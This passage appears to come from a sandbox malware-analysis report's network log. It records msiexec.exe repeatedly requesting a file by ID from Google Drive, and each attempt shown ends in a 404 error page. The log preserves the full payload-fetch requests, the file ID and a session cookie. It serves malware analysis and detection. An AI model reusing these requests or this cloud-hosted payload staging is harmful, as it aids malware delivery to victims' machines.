                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:10 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC51A7hdGhdBtxevsupkliTbPUfXTEiuiE5W4peFggR395VIwxZtdQzdGTdVNikZhNMp
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:09 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-wfHNKyHDkVHfbt07Qisp4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 4d 6d 67 42 79 35 6f 6c 49 49 73 64 73 77 59 5f 62 30 4c 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6MmgBy5olIIsdswY_b0LSQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.649993142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:10 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:11 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:11 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-iUSS29ZvXO9Spl7jGKjOgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.649994216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:11 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:12 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRAYTFkUW16vrpsJjmJVJfjoR_qIoG6I3L26az4tMRW66segR7eCb1MxpVkKHVdbpB-Y0NavGk
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:12 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZuiuguO_nuj0AxguTa4gxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 70 78 4e 71 4a 55 4d 2d 74 65 56 4c 70 62 76 32 66 69 72 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="opxNqJUM-teVLpbv2firfA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.649995142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:13 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:13 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:13 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-FG_gG0y07ug3o__naKNXDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.649996216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:14 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:14 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQFUHouCZrnKkoaErDeSkJyv5vtNJ2qfZRNjOIFl3tu9KhC3ODC7aSnUTuhpTk3UXsw
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:14 GMT
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-MVpHkghoH7BNIKXY7IHbFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 53 6a 48 58 44 78 31 35 41 5f 61 4c 75 6e 59 6f 32 64 57 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2SjHXDx15A_aLunYo2dWlQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.649997142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:15 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:15 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:15 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-fHJIph4qD8CvDEIng9_rDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.649998216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:16 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:16 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSSiKX0-gsKqyBGPLqDsZAR4jzajSLuGOrXyXlTb4e5yjHkUJudtsllSwXG7RhyzhdK
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:16 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-4OVcAue2NTF1QYbkvDiw5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 77 74 64 79 64 4a 52 62 50 56 6d 4c 5a 74 73 39 41 6b 41 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qwtdydJRbPVmLZts9AkAbA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.649999142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:17 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:18 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:18 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
